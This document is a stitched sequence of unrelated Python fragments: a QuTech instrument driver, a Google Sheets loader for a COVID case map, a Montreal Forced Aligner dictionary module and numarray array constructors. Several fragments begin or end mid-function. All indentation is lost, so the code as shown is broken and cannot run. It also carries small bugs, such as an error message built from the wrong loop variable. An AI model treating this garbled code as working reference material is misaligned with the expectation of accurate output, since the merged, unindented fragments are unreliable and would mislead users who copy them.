raise ValueError(f"Cannot calibration inputs: meas time is too low; min 1e-6, actual: {meas_time}")
if nr_itr < 1:
raise ValueError(f"Cannot calibration inputs: nr_itr needs to be positive; actual: {nr_itr}")
if target_index != "":
target_index = f",{target_index}"
self.write(f'DIO:CALibrate:PARam {meas_time},{nr_itr}{target_index}')
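# Worked example of the duration estimate in the docstring (arbitrary values):
# meas_time = 1e-3 s and nr_itr = 100 gives 1e-3 * 100 * 20 * 1.1 = 2.2 s, and a
# per-index meas_time of 1e-3 s stays below the 25e-2 s SCPI-timeout threshold
# mentioned above.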
##########################################################################
# QCoDeS parameter support
##########################################################################
# overrides IPInstrument
def snapshot_base(self, update=False,
params_to_skip_update: Sequence[str] = None,
params_to_exclude: Sequence[str] = None) -> Dict:
"""
State of the instrument as a JSON-compatible dict.
Args:
update: If True, update the state by querying the
instrument. If False, just use the latest values in memory.
params_to_skip_update: List of parameter names that will be skipped
in update even if update is True. This is useful if you have
parameters that are slow to update but can be updated in a
different way (as in the qdac)
params_to_exclude: List of parameter names that will be excluded from the snapshot
Returns:
dict: base snapshot
"""
if params_to_skip_update is None:
params_to_skip_update = self._params_to_skip_update
# FIXME: Enable when QCodes PR #1653 is merged, see PycQED_py3 issue #566
# snap = super().snapshot_base(update=update,
# params_to_skip_update=params_to_skip_update)
# return snap
# FIXME: Workaround, remove when QCodes PR #1653 is merged, see PycQED_py3 issue #566
if params_to_exclude is None:
params_to_exclude = self._params_exclude_snapshot
#
snap = {
"functions": {name: func.snapshot(update=update)
for name, func in self.functions.items()},
"submodules": {name: subm.snapshot(update=update)
for name, subm in self.submodules.items()},
"__class__": full_class(self)
}
snap['parameters'] = {}
for name, param in self.parameters.items():
if params_to_exclude and name in params_to_exclude:
continue
if params_to_skip_update and name in params_to_skip_update:
update_par = False
else:
update_par = update
try:
snap['parameters'][name] = param.snapshot(update=update_par)
except Exception:
# really log this twice. Once verbose for the UI and once
# at lower level with more info for file based loggers
logging.info(
"Snapshot: Could not update parameter: {}".format(name))
self.log.info(f"Details for Snapshot:",
exc_info=True)
snap['parameters'][name] = param.snapshot(update=False)
for attr in set(self._meta_attrs):
if hasattr(self, attr):
snap[attr] = getattr(self, attr)
snap['port'] = self._port
snap['confirmation'] = self._confirmation
snap['address'] = self._address
snap['terminator'] = self._terminator
snap['timeout'] = self._timeout
snap['persistent'] = self._persistent
return snap
# FIXME: End remove
##########################################################################
# QCoDeS parameter helpers
##########################################################################
def _set_cw_waveform(self, ch: int, cw: int, waveform):
wf_name = 'wave_ch{}_cw{:03}'.format(ch, cw)
cw_cmd = 'sequence:element{:d}:waveform{:d}'.format(cw, ch)
self.createWaveformReal(wf_name, waveform)
self.write(cw_cmd + ' "{:s}"'.format(wf_name))
def _get_cw_waveform(self, ch: int, cw: int):
wf_name = 'wave_ch{}_cw{:03}'.format(ch, cw)
return self.getWaveformDataFloat(wf_name)
def _setMatrix(self, chPair, mat):
"""
Args:
chPair(int): channel pair for operation, 1 or 3
mat(np.matrix): 2x2 matrix for mixer calibration
"""
# function used internally for the parameters because of formatting
self.write('qutech:output{:d}:matrix {:f},{:f},{:f},{:f}'.format(
chPair, mat[0, 0], mat[1, 0], mat[0, 1], mat[1, 1]))
def _getMatrix(self, chPair):
# function used internally for the parameters because of formatting
mstring = self.ask(f'qutech:output{chPair}:matrix?')
M = np.zeros(4)
for i, x in enumerate(mstring.split(',')):
M[i] = x
M = M.reshape(2, 2, order='F')
return (M)
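# Example of the SCPI formatting used by _setMatrix (values are arbitrary):
# _setMatrix(1, np.matrix([[1.0, 0.1], [0.05, 1.0]])) writes
# 'qutech:output1:matrix 1.000000,0.050000,0.100000,1.000000', i.e. the four
# entries in column-major order, matching the order='F' reshape in _getMatrix.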
def _setCodewordProtocol(self, protocol_name):
"""
Args:
protocol_name(string): Name of the predefined protocol
"""
# function used internally for the parameters because of formatting
protocol = self.codeword_protocols.get(protocol_name)
if protocol is None:
allowed_protocols = ", ".join(f'{protocol_name}' for protocols_name in self.codeword_protocols)
raise ValueError(f"Invalid protocol: actual: {protocol_name}, expected: {allowed_protocols}")
for ch, bitMap in enumerate(protocol):
self.set(f"ch{ch | |
import json
import pickle
import os.path
import configparser
import pandas as pd
import re
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from datetime import datetime, timedelta
from shutil import copyfile
class GoogleSheet(object):
'''
Simple object to help organize sheet metadata.
Attributes:
:spreadsheetid:-> str, Google Spreadsheet ID (from link).
:name: -> list or str, sheet name (list when multiple sheets in 1 spreadsheet).
:ID: -> str, code for ID column in sheets (specific to region).
'''
def __init__(self, *args):
self.spreadsheetid = args[0]
self.name = args[1]
self.ID = args[2]
def get_GoogleSheets(config: configparser.ConfigParser) -> GoogleSheet:
'''
Fetch info for the different sheets.
'''
# fetch for original sheet (temporary as things will get migrated)
sheet0 = config['ORIGINAL_SHEET']
name1 = sheet0.get('NAME1')
name2 = sheet0.get('NAME2')
sid = sheet0.get('SID')
ID = sheet0.get('ID')
s1 = GoogleSheet(sid, name1, ID)
s2 = GoogleSheet(sid, name2, ID)
sheets = [s1, s2] # change to blank when no longer using original.
# Fetch for Regional Sheets.
pattern = r'^SHEET\d*$'
sections = config.sections()
for s in sections:
if re.match(pattern, s):
id_ = config[s]['ID']
sid = config[s]['SID']
name = config[s]['NAME']
googlesheet = GoogleSheet(sid, name, id_)
sheets.append(googlesheet)
return sheets
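# Sketch of the config.ini layout this function expects (section and key names
# follow the lookups above; the values shown are placeholders, not real IDs):
#
#     [ORIGINAL_SHEET]
#     SID = <spreadsheet id>
#     NAME1 = <first sheet name>
#     NAME2 = <second sheet name>
#     ID = <id column code>
#
#     [SHEET001]
#     SID = <spreadsheet id>
#     NAME = <sheet name>
#     ID = <region-specific id code>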
def log_message(message: str, config: configparser.ConfigParser) -> None:
logfile = config['FILES'].get('LOG', './logfile')
date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
message = '{} {}'.format(date, message)
with open(logfile, 'a') as F:
F.write(message)
F.write('\n')
def savedata(data: list, outfile: str) -> None:
'''
Save data to file.
'''
with open(outfile, 'w') as F:
json.dump(data, F)
def load_sheet(Sheet: GoogleSheet, config: configparser.ConfigParser) -> pd.DataFrame:
# Sheet Import Script adapted from : https://developers.google.com/sheets/api/quickstart/python
scopes = ['https://www.googleapis.com/auth/spreadsheets.readonly']
creds = None
token = config['SHEETS'].get('TOKEN', './token.pickle')
credentials = config['SHEETS'].get('CREDENTIALS', './credentials.json')
spreadsheetid = Sheet.spreadsheetid
data_range = f'{Sheet.name}!A:V'
if os.path.exists(token):
with open(token, 'rb') as t:
creds = pickle.load(t)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
credentials, scopes)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(token, 'wb') as t:
pickle.dump(creds, t)
service = build('sheets', 'v4', credentials=creds)
# Call the Sheets API
sheet = service.spreadsheets()
values = sheet.values().get(spreadsheetId=spreadsheetid, range=data_range).execute().get('values', [])
if not values:
raise ValueError('Sheet data not found')
else:
# Have to loop through values because row lengths don't necessarily match the number of columns.
columns = values[0]
data = values[1:]
n = len(columns)
ilat = columns.index('latitude')
ilon = columns.index('longitude')
idate = columns.index('date_confirmation')
keep = []
for _ in data:
d = _.copy() # might change the value.
# Flags to write to log accurately.
length_error = False
lat_error = False
date_error = False
try:
# Length Errors
# Trailing empty cells return a different length than otherwise
length_error = True
if len(d) < n :
# extend with empty strings
nstrings = n - len(d)
d.extend(['']*nstrings)
assert len(d) == n
length_error = False
# Lat/Long errors
lat_error = True
_ = float(d[ilat])
_ = float(d[ilon])
lat_error = False
# Dates
date_error = True
date = d[idate]
if date == '':
continue
elif '-' in d[idate]:
date = d[idate].split('-')[-1]
else:
date = d[idate]
_ = pd.to_datetime(date, format='%d.%m.%Y', exact=True)
date_error = False
keep.append(d)
except Exception as Err:
if True in [length_error, lat_error, date_error]:
continue
else:
raise Err
for x, y in enumerate(columns):
if y.strip() == '' and columns[x-1] == 'province':
columns[x] = 'country'
return pd.DataFrame(data=keep, columns=columns)
def clean_data(data: pd.DataFrame, colnames: list) -> pd.DataFrame:
'''
Basic cleaning and filtering on dataframe.
Most of this gets done either by curators or pipeline now, this filters out for :
- valid lat/longs
- valid dates (using %d.%m.%Y format)
- manage white space
- Keeps only columns that are going to be in final version.
Args
:data: pd.DataFrame, data from sheet
:colnames: list, list of columns we are keeping for final version
'''
df = data.copy()
df.rename({x: x.strip() for x in df.columns}, inplace=True, axis=1)
# drop invalid lat/longs
lat,lon = df.latitude, df.longitude
invalid_lat = lat.str.contains('#REF') | lat.str.contains('N/A') | lat.isnull() | (lat == '')
invalid_lon = lon.str.contains('#REF') | lon.str.contains('N/A') | lon.isnull() | (lon == '')
invalid = invalid_lat | invalid_lon
df = df[~invalid] # NOT invalid
# Only keep those that have a date_confirmation
df['date_confirmation'] = df['date_confirmation'].str.strip() # some have empty spaces
dc = df.date_confirmation
dc = dc.fillna('')
dc = dc.apply(lambda x: x.split('-')[1].strip() if '-' in x else x.strip())
valid_date = (dc != '') & ~(dc.isnull()) & dc.str.match(r'.*\d{2}\.\d{2}\.\d{4}.*')
df = df[valid_date]
df['date_confirmation'] = df['date_confirmation'].str.strip()
# Basic cleaning for strings
for c in ['city', 'province', 'country']:
df[c] = df[c].str.strip()
df[c] = df[c].str.title()
df[c] = df[c].str.replace('\xa0', ' ') # encoding for a space that was found in some entries.
# Only keep the columns we want
df = df[colnames]
return df
def reduceToUnique(data: pd.DataFrame) -> list:
'''
Get counts for unique locations (by lat/long combination).
Output is a records style list [{d1}, {d2}, ... {}].
Does some situational name changing for consistency, but this should be done on the curators' side.
'''
df = data.copy()
groups = df.groupby(['latitude', 'longitude'])
results = []
for g in groups:
lat, lon = g[0]
cut = g[1]
count = len(cut)
try:
# Uniques to flag inconsistencies.
cities = cut.city.unique()
provinces = cut.province.unique()
countries = cut.country.unique()
# Subject to change.
city = cities[0]
province = provinces[0]
country = countries[0]
if 'Singapore' in countries:
city = ''
province = ''
country = 'Singapore'
elif 'Macau' in provinces:
city = ''
province = 'Macau'
country = 'China'
else:
# get city that occurs the most.
if len(cities) > 1:
vcounts = cut.city.value_counts()
city = vcounts[vcounts == vcounts.max()].index[0]
# Only display this info on map if N cases == 1
age = cut.age.values[0] if count == 1 else ''
sex = cut.sex.values[0] if count == 1 else ''
symptoms = cut.symptoms.values[0] if count == 1 else ''
source = cut.source.values[0] if count == 1 else ''
date_confirmation = cut.date_confirmation.values[0] if count == 1 else ''
geo_resolution = cut.geo_resolution.values[0]
d = {
'latitude': lat,
'longitude': lon,
'city': city,
'province': province,
'country': country,
'age': age,
'sex': sex,
'symptoms': symptoms,
'source': source,
'date_confirmation': date_confirmation,
'cases': count,
'geo_resolution' : geo_resolution
}
results.append(d)
except:
d = {
'latitude': lat,
'longitude': lon,
'city': city,
'province': province,
'country': country,
'age': '',
'sex': '',
'symptoms': '',
'source': '',
'date_confirmation' : '',
'cases': count,
'geo_resolution': geo_resolution
}
results.append(d)
return results
def animation_formating(infile):
'''
Read from "full-data" and convert to something usable for the animation.
'''
with open(infile, 'r') as F:
data = json.load(F)
data = data['data']
data = pd.DataFrame(data)
data = data[['latitude', 'longitude', 'date_confirmation']]
# drop #REF! in case they are propagated here :
data = data[data.latitude != '#REF!']
data = data[data.longitude != '#REF!']
data = data[data.date_confirmation != '#REF!']
data['date'] = pd.to_datetime(data.date_confirmation, errors='coerce', format='%d.%m.%Y')
data['coord'] = data.apply(lambda s: str('{}|{}'.format(s['latitude'], s['longitude'])), axis=1)
# data.drop(['date_confirmation', 'latitude', 'longitude'], inplace=True, axis=1)
data.dropna(inplace=True)
# Sort so that results are in order (might be important for animation)
data.sort_values(by='date', inplace=True)
sums = {} # To store cumulative sums at each location
results = {}
# Loop through dates and coordinates and count
for date in data.date.unique():
datestr = pd.to_datetime(date).strftime('%Y-%m-%d')  # unique() converts to np.datetime64, which doesn't have strftime.
if datestr not in results.keys():
results[datestr] = []
subset = data[data.date == date]
for coord in subset.coord.unique():
N_cases = len(subset[subset.coord == coord])
if coord not in sums.keys():
sums[coord] = N_cases
else:
sums[coord] += N_cases
lat, long = coord.split('|')
results[datestr].append({'caseCount': sums[coord],
'latitude': lat,
'longitude': long})
if sums[coord] < 10:
pin = 'pin4.svg'
elif sums[coord] >= 10 and sums[coord] < 25:
pin = 'pin3.svg'
elif sums[coord] >= 25 and sums[coord] < 50:
pin = 'pin2.svg'
else:
pin = 'pin1.svg'
results[datestr][-1]['pin'] = pin
# Reformatting data to fit with animation script :
dates = results.keys()
array = [{d: results[d]} for d in dates]
return array
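# Shape of the list returned above (values illustrative): one single-key dict per
# confirmation date, mapping the date to that day's cumulative per-location counts:
#
#     [{'2020-01-22': [{'caseCount': 3, 'latitude': '30.59', 'longitude': '114.30',
#                       'pin': 'pin4.svg'}]},
#      ...]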
def animation_formating_geo(infile: str, outfile: str, groupby: str = 'week') -> None:
'''
Read from full data file, and reformat for animation.
Currently grouping on a weekly basis, but subject to change as
| |
# Repository: prosodylab/Montreal-Forced-Aligner
"""Pronunciation dictionaries for use in alignment and transcription"""
from __future__ import annotations
import abc
import collections
import math
import os
import re
import subprocess
import sys
import typing
from typing import TYPE_CHECKING, Dict, Optional, Tuple
import sqlalchemy.orm.session
from sqlalchemy.orm import selectinload
from montreal_forced_aligner.data import PhoneType, WordType
from montreal_forced_aligner.db import (
DictBundle,
Dictionary,
Grapheme,
OovWord,
Phone,
Pronunciation,
Speaker,
Utterance,
Word,
)
from montreal_forced_aligner.dictionary.mixins import (
SanitizeFunction,
SplitWordsFunction,
TemporaryDictionaryMixin,
)
from montreal_forced_aligner.exceptions import (
DictionaryError,
DictionaryFileError,
KaldiProcessingError,
)
from montreal_forced_aligner.helper import split_phone_position
from montreal_forced_aligner.models import DictionaryModel, PhoneSetType
from montreal_forced_aligner.utils import thirdparty_binary
if TYPE_CHECKING:
from dataclasses import dataclass
else:
from dataclassy import dataclass
__all__ = [
"MultispeakerDictionaryMixin",
"MultispeakerDictionary",
"MultispeakerSanitizationFunction",
]
@dataclass
class MultispeakerSanitizationFunction:
"""
Function for sanitizing text based on a multispeaker dictionary
Parameters
----------
speaker_mapping: dict[str, str]
Mapping of speakers to dictionary names
sanitize_function: :class:`~montreal_forced_aligner.dictionary.mixins.SanitizeFunction`
Function to use for stripping punctuation
split_functions: dict[str, :class:`~montreal_forced_aligner.dictionary.mixins.SplitWordsFunction`]
Mapping of dictionary ids to functions for splitting compounds and clitics into separate words
"""
speaker_mapping: Dict[str, int]
sanitize_function: SanitizeFunction
split_functions: Dict[int, SplitWordsFunction]
def get_dict_id_for_speaker(self, speaker_name: str) -> int:
"""
Get the dictionary id of the speaker
Parameters
----------
speaker_name: str
Speaker to look up
Returns
-------
int
Dictionary id
"""
if speaker_name not in self.speaker_mapping:
speaker_name = "default"
return self.speaker_mapping[speaker_name]
def get_functions_for_speaker(
self, speaker_name: str
) -> Tuple[SanitizeFunction, SplitWordsFunction]:
"""
Look up functions based on speaker name
Parameters
----------
speaker_name
Speaker to get functions for
Returns
-------
:class:`~montreal_forced_aligner.dictionary.mixins.SanitizeFunction`
Function for sanitizing text
:class:`~montreal_forced_aligner.dictionary.mixins.SplitWordsFunction`
Function for splitting up words
"""
try:
dict_id = self.get_dict_id_for_speaker(speaker_name)
split_function = self.split_functions[dict_id]
except KeyError:
split_function = None
return self.sanitize_function, split_function
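# Usage sketch (illustrative; the call signatures of SanitizeFunction and
# SplitWordsFunction are defined in dictionary.mixins and only assumed here):
#
#     sanitize, split = sanitization_function.get_functions_for_speaker("speaker_1")
#     # 'sanitize' strips punctuation from raw text; 'split' (when present)
#     # separates clitics and compounds for that speaker's dictionary.
#
# Speakers absent from speaker_mapping fall back to the "default" dictionary id.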
class MultispeakerDictionaryMixin(TemporaryDictionaryMixin, metaclass=abc.ABCMeta):
"""
Mixin class containing information about a pronunciation dictionary with different dictionaries per speaker
Parameters
----------
dictionary_path : str
Dictionary path
kwargs : kwargs
Extra parameters to passed to parent classes (see below)
See Also
--------
:class:`~montreal_forced_aligner.dictionary.mixins.DictionaryMixin`
For dictionary parsing parameters
:class:`~montreal_forced_aligner.abc.TemporaryDirectoryMixin`
For temporary directory parameters
Attributes
----------
dictionary_model: :class:`~montreal_forced_aligner.models.DictionaryModel`
Dictionary model
dictionary_lookup: dict[str, int]
Mapping of dictionary names to ids
"""
def __init__(self, dictionary_path: str = None, **kwargs):
super().__init__(**kwargs)
self.dictionary_model = DictionaryModel(
dictionary_path, phone_set_type=self.phone_set_type
)
self._num_dictionaries = None
self.dictionary_lookup = {}
self._phone_mapping = None
self._grapheme_mapping = None
self._words_mappings = {}
self._default_dictionary_id = None
self._dictionary_base_names = None
self.bracket_regex = None
self.laughter_regex = None
self.compound_regex = None
self.clitic_cleanup_regex = None
self.clitic_marker = None
self.use_g2p = False
@property
def dictionary_base_names(self) -> Dict[int, str]:
"""Mapping of base file names for pronunciation dictionaries"""
if self._dictionary_base_names is None:
with self.session() as session:
dictionaries = session.query(Dictionary.id, Dictionary.name).all()
self._dictionary_base_names = {}
for d_id, d_name in dictionaries:
base_name = d_name
if any(d_name == x[1] and d_id != x[0] for x in dictionaries):
base_name += f"_{d_id}"
self._dictionary_base_names[d_id] = base_name
return self._dictionary_base_names
def word_mapping(self, dictionary_id: int = 1) -> Dict[str, int]:
"""
Get the word mapping for a specified dictionary id
Parameters
----------
dictionary_id: int, optional
Database ID for dictionary, defaults to 1
Returns
-------
dict[str, int]
Mapping from words to their integer IDs for Kaldi processing
"""
if dictionary_id not in self._words_mappings:
self._words_mappings[dictionary_id] = {}
index = 0
with self.session() as session:
words = session.query(Word.word, Word.mapping_id).filter(
Word.dictionary_id == dictionary_id
)
for w, index in words:
self._words_mappings[dictionary_id][w] = index
if index == 0:
return self._words_mappings[dictionary_id]
self._words_mappings[dictionary_id]["#0"] = index + 1
self._words_mappings[dictionary_id]["<s>"] = index + 2
self._words_mappings[dictionary_id]["</s>"] = index + 3
return self._words_mappings[dictionary_id]
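# Note on the mapping built above: besides the words stored in the database,
# three Kaldi symbols are appended after the highest mapping id: "#0"
# (disambiguation), "<s>" and "</s>" (sentence boundaries). For example, if the
# last word id is 42, they receive ids 43, 44 and 45.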
def reversed_word_mapping(self, dictionary_id: int = 1) -> Dict[int, str]:
"""
Get the reversed word mapping for a specified dictionary id
Parameters
----------
dictionary_id: int, optional
Database ID for dictionary, defaults to 1
Returns
-------
dict[int, str]
Mapping from integer IDs to words for Kaldi processing
"""
mapping = {}
for k, v in self.word_mapping(dictionary_id).items():
mapping[v] = k
return mapping
@property
def num_dictionaries(self) -> int:
"""Number of pronunciation dictionaries"""
return len(self.dictionary_lookup)
@property
def sanitize_function(self) -> MultispeakerSanitizationFunction:
"""Sanitization function for the dictionary"""
sanitize_function = SanitizeFunction(
self.clitic_marker,
self.clitic_cleanup_regex,
self.punctuation_regex,
self.word_break_regex,
self.bracket_regex,
self.bracket_sanitize_regex,
self.ignore_case,
)
split_functions = {}
non_speech_regexes = {}
if self.laughter_regex is not None:
non_speech_regexes[self.laughter_word] = self.laughter_regex
if self.bracket_regex is not None:
non_speech_regexes[self.bracketed_word] = self.bracket_regex
with self.session() as session:
dictionaries = session.query(Dictionary.id, Dictionary.default)
speaker_mapping = {
x[0]: x[1] for x in session.query(Speaker.name, Speaker.dictionary_id)
}
for dict_id, default in dictionaries:
if default:
speaker_mapping["default"] = dict_id
clitic_set = set(
x[0]
for x in session.query(Word.word)
.filter(Word.word_type == WordType.clitic)
.filter(Word.dictionary_id == dict_id)
)
initial_clitic_regex = None
final_clitic_regex = None
if self.clitic_marker is not None:
initial_clitics = sorted(
x for x in clitic_set if x.endswith(self.clitic_marker)
)
final_clitics = sorted(
x for x in clitic_set if x.startswith(self.clitic_marker)
)
if initial_clitics:
initial_clitic_regex = re.compile(rf"^{'|'.join(initial_clitics)}(?=\w)")
if final_clitics:
final_clitic_regex = re.compile(rf"(?<=\w){'|'.join(final_clitics)}$")
split_functions[dict_id] = SplitWordsFunction(
self.clitic_marker,
initial_clitic_regex,
final_clitic_regex,
self.compound_regex,
non_speech_regexes,
self.oov_word,
self.word_mapping(dict_id),
self.grapheme_mapping,
self.specials_set,
)
return MultispeakerSanitizationFunction(
speaker_mapping, sanitize_function, split_functions
)
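# Illustrative sketch of the clitic regexes assembled above (hypothetical French-style
# dictionary with clitic_marker "'" and clitics such as "l'" and "'s"):
#
#     initial_clitic_regex ~ re.compile(r"^l'(?=\w)")    # matches the leading "l'" in "l'homme"
#     final_clitic_regex   ~ re.compile(r"(?<=\w)'s$")   # matches the trailing "'s" in "dog's"
#
# The per-dictionary SplitWordsFunction uses these to peel clitics off words during splitting.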
def dictionary_setup(self) -> Tuple[typing.Set[str], collections.Counter]:
"""Set up the dictionary for processing"""
self.compile_regexes()
exist_check = os.path.exists(self.db_path)
if not exist_check:
self.initialize_database()
auto_set = {PhoneSetType.AUTO, PhoneSetType.UNKNOWN, "AUTO", "UNKNOWN"}
if not isinstance(self.phone_set_type, PhoneSetType):
self.phone_set_type = PhoneSetType[self.phone_set_type]
os.makedirs(self.dictionary_output_directory, exist_ok=True)
pretrained = False
if self.non_silence_phones:
pretrained = True
self._speaker_ids = getattr(self, "_speaker_ids", {})
self._current_speaker_index = getattr(self, "_current_speaker_index", 1)
dictionary_id_cache = {}
with self.session() as session:
for speaker_id, speaker_name in session.query(Speaker.id, Speaker.name):
self._speaker_ids[speaker_name] = speaker_id
if speaker_id >= self._current_speaker_index:
self._current_speaker_index = speaker_id + 1
for (
dictionary_id,
dict_name,
default,
max_disambiguation_symbol,
path,
) in session.query(
Dictionary.id,
Dictionary.name,
Dictionary.default,
Dictionary.max_disambiguation_symbol,
Dictionary.path,
):
dictionary_id_cache[path] = dictionary_id
self.dictionary_lookup[dict_name] = dictionary_id
self.max_disambiguation_symbol = max(
self.max_disambiguation_symbol, max_disambiguation_symbol
)
if default:
self._default_dictionary_id = dictionary_id
word_primary_key = 1
pronunciation_primary_key = 1
word_objs = []
pron_objs = []
speaker_objs = []
phone_counts = collections.Counter()
graphemes = set()
for (
dictionary_model,
speakers,
) in self.dictionary_model.load_dictionary_paths().values():
if dictionary_model.path not in dictionary_id_cache and not self.use_g2p:
word_cache = {}
pronunciation_cache = set()
subsequences = set()
pronunciation_counts = collections.defaultdict(int)
if self.phone_set_type not in auto_set:
if (
self.phone_set_type != dictionary_model.phone_set_type
and dictionary_model.phone_set_type not in auto_set
):
raise DictionaryError(
f"Mismatch found in phone sets: {self.phone_set_type} vs {dictionary_model.phone_set_type}"
)
else:
self.phone_set_type = dictionary_model.phone_set_type
dictionary = Dictionary(
name=dictionary_model.name,
path=dictionary_model.path,
phone_set_type=self.phone_set_type,
root_temp_directory=self.dictionary_output_directory,
position_dependent_phones=self.position_dependent_phones,
clitic_marker=self.clitic_marker if self.clitic_marker is not None else "",
bracket_regex=self.bracket_regex.pattern
if self.bracket_regex is not None
else "",
clitic_cleanup_regex=self.clitic_cleanup_regex.pattern
if self.clitic_cleanup_regex is not None
else "",
laughter_regex=self.laughter_regex.pattern
if self.laughter_regex is not None
else "",
default="default" in speakers,
use_g2p=False,
max_disambiguation_symbol=0,
silence_word=self.silence_word,
oov_word=self.oov_word,
bracketed_word=self.bracketed_word,
laughter_word=self.laughter_word,
optional_silence_phone=self.optional_silence_phone,
)
session.add(dictionary)
session.flush()
dictionary_id_cache[dictionary_model.path] = dictionary.id
if dictionary.default:
self._default_dictionary_id = dictionary.id
self._words_mappings[dictionary.id] = {}
current_index = 0
word_objs.append(
{
"id": word_primary_key,
"mapping_id": current_index,
"word": self.silence_word,
"word_type": WordType.silence,
"dictionary_id": dictionary.id,
}
)
self._words_mappings[dictionary.id][self.silence_word] = current_index
current_index += 1
pron_objs.append(
{
"id": pronunciation_primary_key,
"pronunciation": self.optional_silence_phone,
"probability": 1.0,
"disambiguation": None,
"silence_after_probability": None,
"silence_before_correction": None,
"non_silence_before_correction": None,
"word_id": word_primary_key,
}
)
word_primary_key += 1
pronunciation_primary_key += 1
special_words = {self.oov_word: WordType.oov}
if self.bracket_regex is not None:
special_words[self.bracketed_word] = WordType.bracketed
if self.laughter_regex is not None:
special_words[self.laughter_word] = WordType.laughter
specials_found = set()
if not os.path.exists(dictionary_model.path):
raise DictionaryFileError(dictionary_model.path)
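# The parsing loop below expects one entry per line: an orthographic word, optional
# numeric columns, then the phone sequence. Hypothetical example lines (not taken
# from any real dictionary file):
#
#     hello  HH AH L OW
#     hello  0.9  HH EH L OW                      # with a pronunciation probability
#     hello  0.9  0.5  1.2  0.8  HH EH L OW       # plus silence probability corrections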
with open(dictionary_model.path, "r", encoding="utf8") as inf:
for i, line in enumerate(inf):
line = line.strip()
if not line:
continue
line = line.split()
word = line.pop(0)
if len(line) == 0:
raise DictionaryError(
f'Error parsing line {i} of {dictionary_model.path}: "{line}" did not have a pronunciation'
)
if self.ignore_case:
word = word.lower()
if " " in word:
continue
if self.clitic_cleanup_regex is not None:
word = self.clitic_cleanup_regex.sub(self.clitic_marker, word)
if not line:
raise DictionaryError(
f"Line {i} of {dictionary_model.path} does not have a pronunciation."
)
if word in self.specials_set:
continue
characters = list(word)
if word not in special_words:
graphemes.update(characters)
prob = None
try:
if len(line) <= 1:
raise ValueError
prob = float(line[0])
if prob > 1 or prob < 0.01:
raise ValueError
line.pop(0)
except ValueError:
pass
silence_after_prob = None
silence_before_correct = None
non_silence_before_correct = None
try:
if len(line) <= 3:
raise ValueError
silence_after_prob = float(line[0])
if (
silence_after_prob == dictionary.silence_probability
or silence_after_prob == 0
):
silence_after_prob = None
silence_before_correct = float(line[1])
if silence_before_correct == 1.0 or silence_before_correct == 0:
silence_before_correct = None
non_silence_before_correct = float(line[2])
if (
non_silence_before_correct == 1.0
or non_silence_before_correct == 0
):
non_silence_before_correct = None
line = line[3:]
except ValueError:
pass
pron = tuple(line)
if pretrained:
difference = (
set(pron) - self.non_silence_phones - self.silence_phones
)
if difference:
self.excluded_phones.update(difference)
self.excluded_pronunciation_count += 1
continue
if word not in word_cache:
if pron == (self.optional_silence_phone,):
wt = WordType.silence
elif dictionary.clitic_marker is not None and (
word.startswith(dictionary.clitic_marker)
| |
if isinstance(sequence, _gen.NDArray):
if (not copy
and (type is None or type==sequence.type())
and (shape is None or shape==sequence.getshape())):
return sequence
if type is not None:
a=sequence.astype(type)
else:
a=sequence.copy()
if shape is not None:
a.setshape(shape)
return a
if _gen.SuitableBuffer(sequence):
return NumArray(buffer=sequence,type=type,shape=shape)
if isinstance(sequence,str):
return fromstring(sequence,type,shape)
if isinstance(sequence,unicode):
raise ValueError("unicode sequence objects not currently handled")
if isinstance(sequence,file):
return fromfile(sequence,type,shape)
if (hasattr(sequence,'__getitem__')
and hasattr(sequence,'__len__')):
return fromlist(sequence,type,shape)
##SEQUENCE is a scalar or unhandleable
##fromlist will complain in the latter case
if isinstance(sequence, _nt.scalarTypes):
if shape is None:
shape = ()
sequence = [sequence]
return fromlist(sequence,type,shape)
def asarray(seq, type=None, typecode=None, dtype=None):
"""converts scalars, lists and tuples to numarray if possible.
passes NumArrays thru making copies only to convert types.
"""
if isinstance(seq, _gen.NDArray) and type is None and typecode is None:
return seq
return array(seq, type=type, typecode=typecode, copy=0, dtype=dtype)
inputarray = asarray # Obsolete synonym
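# Illustrative sketch (added for clarity): asarray() avoids copies when it can.
#
#     a = array([1, 2, 3])
#     asarray(a) is a                 # True: already a NumArray and no type requested
#     asarray([1.0, 2.0])             # builds a new NumArray from the list
#     asarray(a, type=_nt.Float64)    # converted copy (a different object from `a`)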
def fromstring(datastring, type=None, shape=None, typecode=None, dtype=None):
"""Create an array from binary data contained in a string (by copying)
If type is None (the default), the returned array will be of type Int8.
If shape is None (the default), the returned shape will be
(len(datastring),).
"""
type = _nt._typeFromKeywords(type, typecode, dtype)
if type is None:
type=_nt.Int8
if not shape:
size, rem = divmod(len(datastring), type.bytes)
if rem:
raise ValueError("Type size inconsistent with string length")
else:
shape = (size,) # default to a 1-d array
elif _type(shape) is types.IntType:
shape = (shape,)
if len(datastring) != (_gen.product(shape)*type.bytes):
raise ValueError("Specified shape and type inconsistent with string length")
arr = NumArray(shape=shape, type=type)
strbuff = buffer(datastring)
nelements = arr.nelements()
# Currently uses only the byte-by-byte copy, should be optimized to use
# larger element copies when possible.
cfunc = _bytes.functionDict["copyNbytes"]
cfunc((nelements,), strbuff, 0, (type.bytes,),
arr._data, 0, (type.bytes,), type.bytes)
if arr._type is _nt.Bool:
ufunc.not_equal(arr, 0, arr)
return arr
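# Illustrative sketch (assumes `import struct` and a little-endian host):
#
#     s = struct.pack("<2i", 1, 2)                  # 8 raw bytes
#     fromstring(s)                                 # 8-element Int8 array (default type)
#     fromstring(s, type=_nt.Int32)                 # -> array([1, 2])
#     fromstring(s, shape=(2, 1), type=_nt.Int32)   # same data, explicit 2x1 shape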
def fromfile(infile,type=None,shape=None,sizing=STRICT,
typecode=None,dtype=None):
"""Read in an array from INFILE, a file-like object or a filename.
INFILE must have a read() method. If it also has the tell() and
seek() methods, memory allocation will be more efficient when the
SHAPE is unspecified or incomplete, and the filesize is
unchanging.
If INFILE is a string or unicode object, a file with that name is
opened for reading.
INFILE should be in binary mode on systems where that makes sense
(e.g., Win32). read() must be blocking, and if len(read(size)) <
size, it is assumed that end of file has been reached, and no
further read()s are attempted.
If TYPE is None, TYPE is set to Int32.
If SHAPE is None, it is set to (-1,).
Shape completely specified
--------------------------
When SHAPE is completely specified, exactly
